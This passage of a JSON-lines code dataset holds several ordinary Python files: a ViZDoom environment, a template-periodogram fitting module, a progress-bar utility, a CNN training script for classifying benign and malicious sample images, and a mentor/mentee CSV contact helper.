self.game.add_available_button(vzd.Button.MOVE_RIGHT)\n# self.game.add_available_button(vzd.Button.ATTACK)\n#\n# # Adds game variables that will be included in state.\n# self.game.add_available_game_variable(vzd.GameVariable.AMMO2)\n#\n# # Causes episodes to finish after 200 tics (actions)\n# self.game.set_episode_timeout(total_time)\n#\n# # Makes episodes start after 10 tics (~after raising the weapon)\n# self.game.set_episode_start_time(10)\n#\n# # Sets the living reward (for each move) to -1\n# self.game.set_living_reward(-1)\n#\n# # Sets ViZDoom mode (PLAYER, ASYNC_PLAYER, SPECTATOR, ASYNC_SPECTATOR, PLAYER mode is default)\n# self.game.set_mode(vzd.Mode.PLAYER)\n#\n# # Enables engine output to console.\n# # game.set_console_enabled(True)\n#\n# # Initialize the game. Further configuration won't take any effect from now on.\n# self.game.init()\n#\n# def reset(self):\n# self.game.new_episode()\n# state, done, info = self._get_observation()\n# return state\n#\n# def _init_render(self):\n# # Sets other rendering options (all of these options except crosshair are enabled (set to True) by default)\n# self.game.set_render_hud(False)\n# self.game.set_render_minimal_hud(False) # If hud is enabled\n# self.game.set_render_crosshair(False)\n# self.game.set_render_weapon(True)\n# self.game.set_render_decals(False) # Bullet holes and blood on the walls\n# self.game.set_render_particles(False)\n# self.game.set_render_effects_sprites(False) # Smoke and blood\n# self.game.set_render_messages(False) # In-game messages\n# self.game.set_render_corpses(False)\n# self.game.set_render_screen_flashes(True) # Effect upon taking damage or picking up items\n#\n# # Makes the window appear (turned on by default)\n# self.game.set_window_visible(True)\n# # Turns on the sound. (turned off by default)\n# # game.set_sound_enabled(True)\n#\n# def render(self, mode='human'):\n# pass\n#\n# def _get_observation(self):\n# done = False\n# if self.game.is_episode_finished():\n# done = True\n#\n# # Gets the state\n# state = self.game.get_state()\n# if state is None:\n# done = True\n# # Which consists of:\n# n = state.number\n# vars = state.game_variables\n# screen_buf = state.screen_buffer\n# depth_buf = state.depth_buffer\n# labels_buf = state.labels_buffer\n# automap_buf = state.automap_buffer\n# labels = state.labels\n# objects = state.objects\n# sectors = state.sectors\n#\n# # img = im.fromarray(automap_buf, 'RGB')\n# # img.show(\"test\")\n# return state, done, {\"total_reward\": self.game.get_total_reward()}\n#\n# def step(self, action: int):\n# r = self.game.make_action(self.actions[action])\n#\n# if self.sleep_time > 0:\n# sleep(self.sleep_time)\n#\n# state, done, info = self._get_observation()\n# return state, r, done, info\n#\n# def __del__(self):\n# self.game.close()\n","sub_path":"DoomEnv.py","file_name":"DoomEnv.py","file_ext":"py","file_size_in_byte":14330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"552089788","text":"from __future__ import print_function\n\nfrom functools import wraps\n\nimport numpy as np\nfrom scipy import optimize\n\nfrom .utils import weights, ModelFitParams\nfrom .template import Template\nfrom . import core as pdg\n\n\n# function wrappers for performing checks\ndef requires_templates(func):\n @wraps(func)\n def wrap(self, *args, **kwargs):\n self._validate_templates()\n return func(self, *args, **kwargs)\n return wrap\n\n\ndef requires_template(func):\n @wraps(func)\n def wrap(self, *args, **kwargs):\n self._validate_template()\n return func(self, *args, **kwargs)\n return wrap\n\n\ndef requires_data(func):\n @wraps(func)\n def wrap(self, *args, **kwargs):\n self._validate_data()\n return func(self, *args, **kwargs)\n return wrap\n\n\ndef power_from_fit(t, y, dy, yfit):\n w = weights(dy)\n ybar = np.dot(w, y)\n\n chi2_0 = np.dot(w, (y-ybar)**2)\n chi2 = np.dot(w, (y-yfit)**2)\n\n return 1. - (chi2 / chi2_0)\n\n\nclass TemplateModel(object):\n \"\"\"\n Template for models of the form :math:`a * M(t - tau) + c` for\n some template M.\n\n Parameters\n ----------\n template : Template\n Template for the model\n frequency : float, optional (default = 1.0)\n Frequency of the signal\n parameters : ModelFitParams\n Parameters for the model (a, b, c, sgn); must be a `ModelFitParams`\n instance\n\n Examples\n --------\n >>> params = ModelFitParams(a=1, b=1, c=0, sgn=1)\n >>> template = Template([ 1.0, 0.4, 0.2], [0.1, 0.9, 0.2])\n >>> model = TemplateModel(template, frequency=1.0, parameters=params)\n >>> t = np.linspace(0, 10, 100)\n >>> y_fit = model(t)\n \"\"\"\n def __init__(self, template, frequency=1.0, parameters=None):\n self.template = template\n self.frequency = frequency\n self.parameters = parameters\n\n def _validate(self):\n if not isinstance(self.template, Template):\n raise TypeError(\"template must be a Template instance\")\n if not isinstance(self.parameters, ModelFitParams):\n raise TypeError(\"parameters must be ModelFitParams instance (type = {0}\".format(type(self.parameters)))\n\n def __call__(self, t):\n self._validate()\n\n wtau = np.arccos(self.parameters.b)\n if self.parameters.sgn == -1:\n wtau = 2 * np.pi - wtau\n\n tau = wtau / (2 * np.pi * self.frequency)\n phase = (self.frequency * (t - tau)) % 1.0\n\n return self.parameters.a * self.template(phase) + self.parameters.c\n\n\nclass FastTemplatePeriodogram(object):\n \"\"\"Base class for template periodogram instances\n\n Fits a single template to the data. For\n fitting multiple templates, use the FastMultiTemplatePeriodogram\n\n Parameters\n ----------\n template : Template\n Template to fit (must be Template instance)\n allow_negative_amplitudes : bool (optional, default=True)\n if False, then negative optimal template amplitudes\n will be replaced with zero-amplitude solutions. A False\n value prevents the modeler from fitting an inverted\n template to the data, but does not attempt to find the\n best positive amplitude solution, which would require\n substantially more computational resources.\n \"\"\"\n def __init__(self, template=None, allow_negative_amplitudes=True):\n self.template = template\n self.allow_negative_amplitudes = allow_negative_amplitudes\n self.t, self.y, self.dy = None, None, None\n self.best_model = None\n\n def _validate_template(self):\n if self.template is None:\n raise ValueError(\"No template set.\")\n if not isinstance(self.template, Template):\n raise ValueError(\"template is not a Template instance.\")\n\n #self.template.precompute()\n\n def _validate_data(self):\n if any([ X is None for X in [ self.t, self.y, self.dy ] ]):\n raise ValueError(\"One or more of t, y, dy is None; \"\n \"fit(t, y, dy) must be called first.\")\n inds = np.arange(len(self.t) - 1)\n if any(self.t[inds] > self.t[inds+1]):\n raise ValueError(\"One or more observations are not consecutive.\")\n\n if not (len(self.t) == len(self.y) and len(self.y) == len(self.dy)):\n raise ValueError(\"One or more of (t, y, dy) arrays are unequal lengths\")\n\n def _validate_frequencies(self, frequencies):\n raise NotImplementedError()\n\n def fit(self, t, y, dy=None):\n \"\"\"\n Parameters\n ----------\n t: array_like\n sequence of observation times\n y: array_like\n sequence of observations associated with times `t`\n dy: float or array_like (optional, default=None)\n error(s)/uncertaint(ies) associated with observed values `y`.\n If scalar, all observations are weighted equally, which is\n effectively the same as setting `dy=None`.\n\n Returns\n -------\n self : FastTemplatePeriodogram\n Returns self\n \"\"\"\n # TODO: validate dy when it is float or None\n\n self.t = np.array(t)\n self.y = np.array(y)\n self.dy = np.array(dy)\n return self\n\n @requires_data\n @requires_template\n def fit_model(self, freq):\n \"\"\"Fit a template model to data.\n\n y_model(t) = a * template(freq * (t - tau)) + c\n\n Parameters\n ----------\n freq : float\n Frequency at which to fit a template model\n\n Returns\n -------\n model : TemplateModel\n The best-fit model at this frequency\n \"\"\"\n freq = float(freq)\n p, parameters = pdg.fit_template(self.t, self.y, self.dy,\n self.template.c_n, self.template.s_n, freq,\n allow_negative_amplitudes=self.allow_negative_amplitudes)\n return TemplateModel(self.template, parameters=parameters,\n frequency=freq)\n\n @requires_data\n def autofrequency(self, nyquist_factor=5, samples_per_peak=5,\n minimum_frequency=None, maximum_frequency = None):\n \"\"\"\n Determine a suitable frequency grid for data.\n\n Note that this assumes the peak width is driven by the observational\n baseline, which is generally a good assumption when the baseline is\n much larger than the oscillation period.\n If you are searching for periods longer than the baseline of your\n observations, this may not perform well.\n\n Even with a large baseline, be aware that the maximum frequency\n returned is based on the concept of \"average Nyquist frequency\", which\n may not be useful for irregularly-sampled data. The maximum frequency\n can be adjusted via the nyquist_factor argument, or through the\n maximum_frequency argument.\n\n Parameters\n ----------\n samples_per_peak : float (optional, default=5)\n The approximate number of desired samples across the typical peak\n nyquist_factor : float (optional, default=5)\n The multiple of the average nyquist frequency used to choose the\n maximum frequency if maximum_frequency is not provided.\n minimum_frequency : float (optional)\n If specified, then use this minimum frequency rather than one\n chosen based on the size of the baseline.\n maximum_frequency : float (optional)\n If specified, then use this maximum frequency rather than one\n chosen based on the average nyquist frequency.\n\n Returns\n -------\n frequency : ndarray or Quantity\n The heuristically-determined optimal frequency bin\n \"\"\"\n baseline = self.t.max() - self.t.min()\n n_samples = self.t.size\n\n df = 1. / (baseline * samples_per_peak)\n\n if minimum_frequency is not None:\n nf0 = min([ 1, np.floor(minimum_frequency / df) ])\n else:\n nf0 = 1\n\n if maximum_frequency is not None:\n Nf = int(np.ceil(maximum_frequency / df - nf0))\n else:\n Nf = int(0.5 * samples_per_peak * nyquist_factor * n_samples)\n\n return df * (nf0 + np.arange(Nf))\n\n @requires_data\n @requires_template\n def autopower(self, save_best_model=True, fast=True, **kwargs):\n \"\"\"\n Compute template periodogram at automatically-determined frequencies\n\n Parameters\n ----------\n save_best_model : optional, bool (default = True)\n Save a TemplateModel instance corresponding to the best-fit model found\n **kwargs : optional, dict\n Passed to `autofrequency`\n\n Returns\n -------\n frequency, power : ndarray, ndarray\n The frequency and template periodogram power\n \"\"\"\n frequency = self.autofrequency(**kwargs)\n p, bfpars = pdg.template_periodogram(self.t, self.y, self.dy, self.template.c_n,\n self.template.s_n, frequency, fast=fast,\n allow_negative_amplitudes=self.allow_negative_amplitudes)\n\n if save_best_model:\n i = np.argmax(p)\n self._save_best_model(TemplateModel(self.template,\n frequency = frequency[i],\n parameters = bfpars[i]))\n return frequency, p\n\n @requires_data\n @requires_template\n def power(self, frequency, save_best_model=True):\n \"\"\"\n Compute template periodogram at a given set of frequencies; slower than\n `autopower`, but frequencies are not restricted to being evenly spaced\n\n Parameters\n ----------\n frequency : float or array_like\n Frequenc(ies) at which to determine template periodogram power\n save_best_model : optional, bool (default=True)\n Save best model fit, accessible via the `best_model` attribute\n **kwargs : optional, dict\n Passed to `autofrequency`\n\n Returns\n -------\n power : float or ndarray\n The frequency and template periodogram power, a\n \"\"\"\n # Allow inputs of any shape; we'll reshape output to match\n frequency = np.asarray(frequency)\n shape = frequency.shape\n frequency = frequency.ravel()\n\n def fitter(freq):\n return pdg.fit_template(self.t, self.y, self.dy,\n self.template.c_n, self.template.s_n,freq,\n allow_negative_amplitudes=self.allow_negative_amplitudes)\n\n p, bfpars = zip(*map(fitter, frequency))\n p = np.array(p)\n\n if save_best_model:\n i = np.argmax(p)\n best_model = TemplateModel(self.template,\n frequency=frequency[i],\n parameters=bfpars[i])\n self._save_best_model(best_model)\n\n return p.reshape(shape)\n\n def _save_best_model(self, model, overwrite=False):\n if overwrite or self.best_model is None:\n self.best_model = model\n else:\n # if there is an existing best model, replace\n # with new best model only if new model improves fit\n y_fit = model(self.t)\n y_best = self.best_model(self.t)\n\n p_fit = power_from_fit(self.t, self.y, self.dy, y_fit)\n p_best = power_from_fit(self.t, self.y, self.dy, y_best)\n\n if p_fit > p_best:\n self.best_model = model\n\n\nclass FastMultiTemplatePeriodogram(FastTemplatePeriodogram):\n \"\"\"\n Template modeler that fits multiple templates\n\n Parameters\n ----------\n templates : list of Template\n Templates to fit (must be list of Template instances)\n allow_negative_amplitudes : bool (optional, default=True)\n if False, then negative optimal template amplitudes\n will be replaced with zero-amplitude solutions. A False\n value prevents the modeler from fitting an inverted\n template to the data, but does not attempt to find the\n best positive amplitude solution, which would require\n substantially more computational resources.\n \"\"\"\n def __init__(self, templates=None, allow_negative_amplitudes=True):\n self.templates = templates\n self.allow_negative_amplitudes = allow_negative_amplitudes\n self.t, self.y, self.dy = None, None, None\n self.best_model = None\n\n def _validate_templates(self):\n if self.templates is None:\n raise ValueError(\"No templates set.\")\n if not hasattr(self.templates, '__iter__'):\n raise ValueError(\".templates must be iterable.\")\n if len(self.templates) == 0:\n raise ValueError(\"No templates.\")\n for template in self.templates:\n if not isinstance(template, Template):\n raise ValueError(\"One or more templates are not Template instances.\")\n #template.precompute()\n\n @requires_data\n @requires_templates\n def fit_model(self, freq):\n \"\"\"Fit a template model to data.\n\n y_model(t) = a * template(freq * (t - tau)) + c\n\n Parameters\n ----------\n freq : float\n Frequency at which to fit a template model\n\n Returns\n -------\n model : TemplateModel\n The best-fit model at this frequency\n \"\"\"\n if not any([ isinstance(freq, type_) for type_ in [ float, np.floating ] ]) :\n raise ValueError('fit_model requires float argument')\n\n p, parameters = zip(*[pdg.fit_template(self.t, self.y, self.dy,\n template.c_n, template.s_n, freq,\n allow_negative_amplitudes=self.allow_negative_amplitudes)\n for template in self.templates ])\n\n i = np.argmax(p)\n params = parameters[i]\n template = self.templates[i]\n\n return TemplateModel(template, parameters=params, frequency=freq)\n\n @requires_data\n @requires_templates\n def autopower(self, save_best_model=True, fast=True, **kwargs):\n \"\"\"\n Compute template periodogram at automatically-determined frequencies\n\n Parameters\n ----------\n save_best_model : optional, bool (default = True)\n Save a TemplateModel instance corresponding to the best-fit model found\n **kwargs : optional, dict\n Passed to `autofrequency`\n\n Returns\n -------\n frequency, power : ndarray, ndarray\n The frequency and template periodogram power\n \"\"\"\n frequency = self.autofrequency(**kwargs)\n\n results = [pdg.template_periodogram(self.t, self.y, self.dy, template.c_n,\n template.s_n, frequency, fast=fast,\n allow_negative_amplitudes=self.allow_negative_amplitudes)\n for template in self.templates]\n\n p, bfpars = zip(*results)\n if save_best_model:\n maxes = [ max(P) for P in p ]\n\n i = np.argmax(maxes)\n j = np.argmax(p[i])\n\n self._save_best_model(TemplateModel(self.templates[i],\n frequency=frequency[j],\n parameters=bfpars[i][j]))\n\n return frequency, np.max(p, axis=0)\n\n @requires_data\n def power_from_single_template(self, frequency, template, fast=False, save_best_model=True):\n \"\"\"\n Compute template periodogram at a given set of frequencies; slower than\n `autopower`, but frequencies are not restricted to being evenly spaced\n\n Parameters\n ----------\n frequency : float or array_like\n Frequenc(ies) at which to determine template periodogram power\n save_best_model : optional, bool (default=True)\n Save best model fit, accessible via the `best_model` attribute\n **kwargs : optional, dict\n Passed to `autofrequency`\n\n Returns\n -------\n power : float or ndarray\n The frequency and template periodogram power, a\n \"\"\"\n # Allow inputs of any shape; we'll reshape output to match\n frequency = np.asarray(frequency)\n shape = frequency.shape\n frequency = frequency.ravel()\n\n p, bfpars = pdg.template_periodogram(self.t, self.y, self.dy,\n template.c_n, template.s_n,\n frequency, \n fast=fast, \n allow_negative_amplitudes=self.allow_negative_amplitudes)\n p = np.asarray(p)\n if save_best_model:\n i = np.argmax(p)\n best_model = TemplateModel(template, frequency = frequency[i],\n parameters = bfpars[i])\n self._save_best_model(best_model)\n\n return p.reshape(shape)\n\n @requires_data\n @requires_templates\n def power(self, frequency, save_best_model=True, fast=False):\n \"\"\"\n Compute template periodogram at a given set of frequencies\n\n Parameters\n ----------\n frequency : float or array_like\n Frequenc(ies) at which to determine template periodogram power\n save_best_model : optional, bool (default=True)\n Save best model fit, accessible via the `best_model` attribute\n **kwargs : optional, dict\n Passed to `autofrequency`\n\n Returns\n -------\n power : float or ndarray\n The frequency and template periodogram power, a\n \"\"\"\n all_power = [self.power_from_single_template(frequency, template,\n fast=fast,\n save_best_model=save_best_model)\\\n for template in self.templates ]\n\n return np.max(all_power, axis=0)\n\n\nclass SlowTemplatePeriodogram(object):\n \"\"\"Slow periodogram built from a template model.\n\n When computing the periodogram, this performs a nonlinear optimization at\n each frequency. This is used mainly for testing the faster method\n available in FastTemplatePeriodogram\n\n Parameters\n ----------\n template : Template object\n callable object that returns the template value as a function of phase\n nguesses : int, optional (default: 10)\n number of initial guesses for the phase shift parameter (to avoid local minima)\n \"\"\"\n # TODO: match the full API of FastTemplateModeler.\n # Perhaps factor-out common routines into a base class?\n\n def __init__(self, template=None, nguesses=10):\n self.template = template\n self.nguesses = nguesses\n\n def fit(self, t, y, dy=None):\n \"\"\"Fit periodogram to given data\n\n Parameters\n ----------\n t : array_like\n sequence of observation times\n y : array_like\n sequence of observations associated with times t\n dy : float, array_like (optional)\n error or sequence of observational errors associated with times t\n \"\"\"\n self.t, self.y, self.dy = self._validate_inputs(t, y, dy)\n return self\n\n def _validate_inputs(self, t, y, dy):\n if dy is None:\n # TODO: handle dy = None case more efficiently\n t, y, dy = np.broadcast_arrays(t, y, 1.0)\n else:\n t, y, dy = np.broadcast_arrays(t, y, dy)\n if t.ndim != 1:\n raise ValueError(\"Inputs (t, y, dy) must be 1-dimensional\")\n return t, y, dy\n\n def _chi2_ref(self):\n \"\"\"Compute the reference chi-square\"\"\"\n weights = self.dy ** -2\n weights /= weights.sum()\n ymean = np.dot(weights, self.y)\n return np.sum((self.y - ymean) ** 2 / self.dy ** 2)\n\n def _minimize_chi2_at_single_freq(self, freq, nguesses=None):\n # at each phase, use a linear model to find best [offset, amplitude]\n # and then minimize this scalar function of phase\n def chi2(phase):\n shifted = self.template(self.t * freq - phase)\n X = np.vstack([np.ones_like(shifted), shifted]).T\n offset, amp = np.linalg.solve(np.dot(X.T, X),\n np.dot(X.T, self.y))\n y_model = offset + amp * shifted\n return np.sum((self.y - y_model) ** 2 / self.dy ** 2)\n \n nguesses = nguesses if not nguesses is None else self.nguesses\n\n # User can opt to run minimize scalar (faster)\n if nguesses is None:\n return optimize.minimize_scalar(chi2, bounds=(0, 1))\n\n # initial guesses for phase shift\n guesses = np.random.rand(nguesses)\n\n local_minimum = lambda x0 : optimize.minimize(chi2, x0, bounds=[(0, 1)])\n\n # get solutions for each initial guess\n local_minima = [ local_minimum(guess) for guess in guesses ]\n\n local_minima = [ res for res in local_minima if res.success ]\n\n if len(local_minima) == 0:\n return optimize.minimize_scalar(chi2, bounds=(0, 1))\n\n # return the best one\n return local_minima[np.argmin([ res.fun for res in local_minima ])]\n\n def power(self, freq):\n \"\"\"Compute a template-based periodogram at the given frequencies\n\n Parameters\n ----------\n freq : array_like\n frequencies at which to evaluate the template periodogram\n\n Returns\n -------\n power : np.ndarray\n normalized power spectrum computed at the given frequencies\n \"\"\"\n freq = np.asarray(freq)\n results = list(map(self._minimize_chi2_at_single_freq, freq.flat))\n failures = sum([ not res.success for res in results])\n if failures:\n raise RuntimeError(\"{0}/{1} frequency values failed to converge\"\n \"\".format(failures, freq.size))\n chi2 = np.array([res.fun for res in results])\n return np.reshape(1 - chi2 / self._chi2_ref(), freq.shape)\n","sub_path":"ftperiodogram/modeler.py","file_name":"modeler.py","file_ext":"py","file_size_in_byte":22257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"38975079","text":"import tensorflow as tf\nimport os\nimport numpy as np\nimport logging\nimport time\nimport sys\n\ndef logging_file(filename):\n logger = logging.getLogger('logger')\n logger.setLevel(logging.DEBUG)\n logging.basicConfig(format='%(message)s', level=logging.DEBUG)\n handler = logging.FileHandler(filename)\n handler.setLevel(logging.DEBUG)\n handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s: %(message)s'))\n logging.getLogger().addHandler(handler)\n return logger\n\nclass Progress(object):\n def __init__(self, target, width=30, verbose=1):\n self.width = width\n self.target = target\n self.verbose = verbose\n self.sum_value = {}\n self.unique_value = {}\n self.start = time.time()\n self.total_width = 0\n self.seen_so_far = 0\n \n def update(self, current, value=[], exact=[], strict=[]):\n for k,v in value:\n if k not in self.sum_value:\n self.sum_value[k] =[v*(current - self.seen_so_far), current - self.seen_sofar]\n self.unique_value.append(k)\n else:\n self.sum_value[k][0] += v*(current - self.seen_so_far)\n self.sum_value[k][1] += (current - self.seen_so_far)\n \n for k, v in exact:\n if k not in self.sum_value:\n self.unique_value.append(k)\n self.sum_value[k] = v\n \n self.seen_so_far = current\n \n now = time.time()\n \n if self.verbose == 1:\n prev_total_width = self.total_width\n sys.stdout.write(\"\\b\" * prev_total_width)\n sys.stdout.write(\"\\r\")\n \n num_digit = int(np.floor(np.log10(self.target))) +1 \n string_bar = '%%%dd/%%%dd [' % (num_digit, num_digit)\n bar = string_bar % (current, self.target)\n prog = float(current)/ self.target\n prog_width = int(self.width*prog)\n if prog_width > 0:\n bar += ('='*(prog_width-1))\n if current < self.target:\n bar += '>'\n else:\n bar += '='\n bar += ('.'*(self.width-prog_width))\n bar += ']'\n sys.stdout.write(bar)\n self.total_width = len(bar)\n \n if current:\n time_per_unit = (now - self.start) / current\n else:\n time_per_unit = 0\n eta = time_per_unit*(self.target - current)\n info = ''\n if current < self.target:\n info += ' -ETA: %ds '%eta\n else:\n info += ' -%ds' %(now - self.start)\n\n for k in self.unique_value:\n if type(self.sum_value[k][0]) is list:\n info += ' -%s: %.4f ' %(k, self.sum_value[k][0] / max(1, self.sum_value[k][1]))\n else:\n info += ' -%s: %s ' %(k, self.sum_value[k])\n\n self.total_width += len(info)\n\n if prev_total_width > self.total_width:\n info += ((prev_total_width-self.total_width)*\" \")\n sys.stdout.write(info)\n sys.stdout.flush()\n\n if current > self.target: \n sys.stdout.write(\"\\n\")\n \n if self.verbose == 2:\n if current >= self.target:\n info = '%ds' %(now-self.start)\n \n for k in self.unique_value:\n info += '- %s: %.4f' %(k, self.sum_value[k][0] / max(1, self.sum_value[k][1]))\n \n sys.stdout.write(info + \"\\n\")\n \n def add(self, n, value=[]):\n self.update(self.seen_so_far+n, value)\n\n ","sub_path":"model/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"421849780","text":"from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras import backend as K\nimport os\nfrom shutil import copyfile\nimport shutil\n\nbenign_list = []\nmalicious_list = []\n# def get_path_list(root_dir):\n# path_list = []\n# for subdir, dirs, files in os.walk(root_dir):\n# for file in files:\n# path_list.append(os.path.join(subdir, file))\n# #return path_list\n\n# dim\\ensisons of our images\nimg_width, img_height = 256, 1024\ndataset = '/home/worker1/Ly/PackDeep/dataset/images/'\ntrain_val = '/home/worker1/Ly/PackDeep/'\n\n# # benign_samples = get_path_list(dataset + 'benign')\n# for subdir, dirs, files in os.walk(dataset + 'benign'):\n# for file in files:\n# benign_list.append(os.path.join(subdir, file))\n# print(len(benign_list))\n\n\n# benign_train = benign_list[:len(benign_list)/2]\n\n# for bt in benign_train:\n# copyfile(bt, train_val + 'train/benign/'+ os.path.basename(bt))\n\n# benign_val = benign_list[len(benign_list)/2:]\n\n\n# for subdir, dirs, files in os.walk(dataset + 'malicious'):\n# for file in files:\n# malicious_list.append(os.path.join(subdir, file))\n# print(len(malicious_list))\n\n# malicious_train = malicious_list[:len(malicious_list)/2]\n# malicious_val = malicious_list[len(malicious_list)/2:]\n\n\nN = 1000\n\n\ndef move_malicious(abs_dirname, ratio):\n \"\"\"Move files into subdirectories.\"\"\"\n train_malicious = 'train/malicious/'\n shutil.rmtree(train_malicious)\n os.makedirs(train_malicious)\n val_malicious = 'validation/malicious/'\n shutil.rmtree(val_malicious)\n os.makedirs(val_malicious)\n files = [os.path.join(abs_dirname, f) for f in os.listdir(abs_dirname)]\n for f in files[0:ratio]:\n # create new subdir if necessary\n #subdir_name = os.path.join(abs_dirname, '{0:03d}'.format(i / N + 1))\n #os.mkdir('train/' + file_type)\n #curr_subdir = subdir_name\n\n # move file to current dir\n f_base = os.path.basename(f)\n\n copyfile(f, train_malicious + f_base)\n\n for f in files[ratio:]:\n # create new subdir if necessary\n #subdir_name = os.path.join(abs_dirname, '{0:03d}'.format(i / N + 1))\n #os.mkdir('validation/' + file_type )\n f_base = os.path.basename(f)\n\n copyfile(f, val_malicious + f_base)\n #copyfile(f, 'validation/malicious/' + f_base)\n\n\ndef move_benign(abs_dirname, ratio):\n \"\"\"Move files into subdirectories.\"\"\"\n\n train_benign = 'train/benign/'\n shutil.rmtree(train_benign)\n os.makedirs(train_benign)\n val_benign = 'validation/benign/'\n shutil.rmtree(val_benign)\n os.makedirs(val_benign)\n files = [os.path.join(abs_dirname, f) for f in os.listdir(abs_dirname)]\n for f in files[0:ratio]:\n # create new subdir if necessary\n #subdir_name = os.path.join(abs_dirname, '{0:03d}'.format(i / N + 1))\n #os.mkdir('train/' + file_type)\n #curr_subdir = subdir_name\n\n # move file to current dir\n f_base = os.path.basename(f)\n\n copyfile(f, train_benign + f_base)\n #copyfile(f, 'train/benign/' + f_base)\n\n for f in files[ratio:]:\n # create new subdir if necessary\n #subdir_name = os.path.join(abs_dirname, '{0:03d}'.format(i / N + 1))\n #os.mkdir('validation/' + file_type )\n f_base = os.path.basename(f)\n\n copyfile(f, val_benign + f_base)\n #copyfile(f, 'validation/benign/' + f_base)\n\nmove_malicious('malicious', 2000)\nmove_benign('benign', 2000)\n# Divide dataset\n\ntrain_data_dir = '/home/worker1/Ly/PackDeep/train'\nvalidation_data_dir = '/home/worker1/Ly/PackDeep/validation'\n# train_data_dir = '/home/lyvd/GitHub/PackDeep/images/train'\n# validation_data_dir = 'images/validation'\nnb_train_samples = 4000\nnb_validation_samples = 2000\nepochs = 100\nbatch_size = 16\n\nif K.image_data_format() == 'channels_first':\n input_shape = (3, img_width, img_height)\nelse:\n input_shape = (img_width, img_height, 3)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=input_shape))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(32, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\n\nmodel.add(Dense(64))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(1))\nmodel.add(Activation('sigmoid'))\n\nmodel.compile(loss='binary_crossentropy',\n optimizer='rmsprop', metrics=['accuracy'])\n\n# This is the augmentation configuration we will use for training\ntrain_datagen = ImageDataGenerator(\n rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n)\n\n# # This is the augmentation configuration we will use for testing\n# # only rescaling\n# test_datagen = ImageDataGenerator(rescale = 1. /255)\ntest_datagen = ImageDataGenerator()\n\ntrain_generator = train_datagen.flow_from_directory(\n 'train/',\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode='binary'\n)\n\nvalidation_generator = test_datagen.flow_from_directory(\n 'validation',\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode='binary'\n)\n\nmodel.fit_generator(\n train_generator,\n steps_per_epoch=nb_train_samples // batch_size,\n epochs=epochs,\n validation_data=validation_generator,\n validation_steps=nb_validation_samples // batch_size\n)\n\n# model.save_weights('first_try.h5')\n# This is a PIL image\n# img = load_img('/home/lyvd/GitHub/PackDeep/DC/train_set/cats/cat.0.jpg')\n# x = img_to_array(img) # This is a Numpy array with share (3, 1510. 150)\n# print(x.shape)\n# x= x.reshape((1,) + x.shape) # this is a Numpy array with shape (1, 3,\n# 150, 150)\n\n# # The .flow() command below generates batches of randomly transfomed images\n# # and saves the results to `previwew` directory\n# i = 0\n# for batch in datagen.flow(x, batch_size = 1, save_to_dir='preview', save_prefix='arp', save_format = 'jpeg'):\n# i += 1\n# if i > 20:\n# break\n","sub_path":"imageGenerator.py","file_name":"imageGenerator.py","file_ext":"py","file_size_in_byte":6227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"427081380","text":"import pandas as pd\nimport numpy as np\nfrom matching.constants import *\n\n\"\"\"\nSplit df by major group.\n\nParameters\n--------------------\n data -- pandas df, mentor/mentee data\n\nReturns\n--------------------\n majorMap -- dict, major_group_no->corresponding_df\n\"\"\"\n\ndef splitByMajor(data):\n majorMap = dict();\n for i in range(1,num_major_categories+1):\n majorMap[i]=data.loc[data[categoryChoices['MajorsQuestion']]==i].reset_index(drop=True)\n return majorMap\n\n\"\"\"\nProcess mentor data to get relevant contact details\n\nParameters\n--------------------\n filename -- string, path to mentor csv\n\nReturns\n--------------------\n mentor_contact -- dict, ucla email -> (name,preferred email,phone)\n\"\"\"\ndef get_mentor_contact(filename):\n mentor_data = pd.read_csv(filename)\n contact_columns=[\"Username\", \"Full Legal Name (First and Last)\", \"Preferred Email (We will use this email for all future communication)\", \"Phone Number (##########)\"]\n mentor_data=mentor_data[contact_columns]\n \n mentor_contact=dict()\n \n for i in range(len(mentor_data)):\n mentor=mentor_data.iloc[i]\n if np.isnan(mentor[3]):\n contact_info=(mentor[1], mentor[2], \"\")\n else:\n contact_info=(mentor[1], mentor[2], int(mentor[3]))\n mentor_contact[mentor[0]]=contact_info\n \n return mentor_contact\n \n\"\"\"\nProcess mentee data to get relevant contact details\n\nParameters\n--------------------\n filename -- string, path to mentee csv\n\nReturns\n--------------------\n mentee_contact -- dict, email -> (name)\n\"\"\"\ndef get_mentee_contact(filename):\n mentee_data = pd.read_csv(filename)\n contact_columns=[\"Name\", \"Email\"]\n mentee_data=mentee_data[contact_columns]\n \n mentee_contact=dict()\n \n for i in range(len(mentee_data)):\n mentee=mentee_data.iloc[i]\n contact_info=(mentee[0])\n mentee_contact[mentee[1]]=contact_info\n \n return mentee_contact\n\n\nif __name__ == '__main__':\n mentor_contact=get_mentor_contact(\"MentorSEAS Mentor Form.csv\")\n print(mentor_contact)\n mentee_contact=get_mentee_contact(\"New-Transfers.csv\")\n print(mentee_contact)\n\n","sub_path":"matching/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"458100455","text":"# -*- coding=utf-8 -*-\nimport datetime\nfrom threading import Thread\nimport 